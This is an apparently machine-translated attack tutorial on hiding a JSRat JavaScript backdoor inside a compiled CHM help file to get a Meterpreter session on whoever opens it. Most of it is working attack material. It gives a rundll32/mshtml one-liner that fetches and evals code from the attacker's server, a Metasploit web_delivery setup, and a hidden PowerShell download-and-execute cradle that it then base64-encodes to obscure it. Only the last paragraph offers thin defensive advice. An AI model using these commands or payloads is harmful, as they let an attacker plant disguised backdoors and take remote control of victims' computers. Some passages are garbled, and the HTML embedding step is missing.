CHM + Jsbackdoor Bundled backdoor

Jsrat server using interactive mode:

#!bashpython MyJSRat.py -i 192.168.1.101 -p 8080

Access HTTP://192.168.1.101:8080/WTF get the attack code as follows:

#!bashrundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

After many tests, the above command was successfully written to the CHM with the following HTML code:

#!html<!DOCTYPE html>

After compiling, the JS Interactive shell can be obtained successfully:

cmd /c commandThere is a black box for direct execution, and you can use run to avoid displaying black boxes. After the run is executed, the input is whoami > e:\1.txt then read to obtain the echo.

2. Get Meterpreter Session

This test gets the Meterpreter session by executing the PowerShell command, which is obtained directly, and automatically executes the PowerShell command after acquiring the client JS Interactive shell to get the Meterpreter session. Here's how:

To open MSF Web_delivery:

#!bash ~ MSFCONSOLE-LQMSF > Use exploit/multi/script/web_deliverymsf Exploit (web_delivery) > Set Target 2target =& Gt 2MSF exploit (Web_delivery) > Set payload windows/meterpreter/reverse_tcppayload = Windows/meterpreter/reverse_ TCPMSF exploit (web_delivery) > Set lhost 192.168.1.101lhost = 192.168.1.101msf Exploit (web_delivery) > Set Lpor T 6666lport = 6666msf Exploit (web_delivery) > Set srvport 8081SRVPORT = 8081msf Exploit (web_delivery) > set Uripath/uripath =/msf Exploit (web_delivery) > exploit[*] exploit running as background job.msf exploit (web_delive ry) >[*] Started reverse TCP handler on 192.168.1.101:6666[*] Using url:http://0.0.0.0:8081/[*] Local ip:http://192.1 68.1.101:8081/[*] Server started. [*] Run the following command on the target machine:powershell.exe-nop-w hidden-c $n =new-object net.webclient; $n. proxy=[net . Webrequest]::getsystemwebproxy (); $n. Proxy.credentials=[net.credentialcache]::D efaultcredentials;iex $n. DownloaDstring (' http://192.168.1.101:8081/'); 

A client with PowerShell can obtain a Meterpreter session by executing the following command:

#!bashpowershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring(‘http://192.168.1.101:8081/‘);

Due to the existence of special characters, we can encode the above code into Base64 format and save the following code to Power.txt

#!bash$n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring(‘http://192.168.1.101:8081/‘);

Execute the following command:

#!bashcat power.txt | iconv --to-code UTF-16LE |base64

The final PowerShell command to be executed is:

#!bashpowershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==

To get a Meterpreter session directly using the Execute Command mode:

#!bashpython MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA=="

During the test, from running the CHM to getting Meterpreter, the client has no obvious exception, the whole black box pops up and gets to Meterpreter session such as:

So far I have not found any defensive posture, I know the small partners can share. The best is to improve personal safety awareness, for such documents, pay more attention to, try not to mess up, if not the main point, you can put into the virtual machine inside. Using Procexp.exe, you can see that a CHM file with a backdoor will open a new process.

CHM + Jsbackdoor Bundled backdoor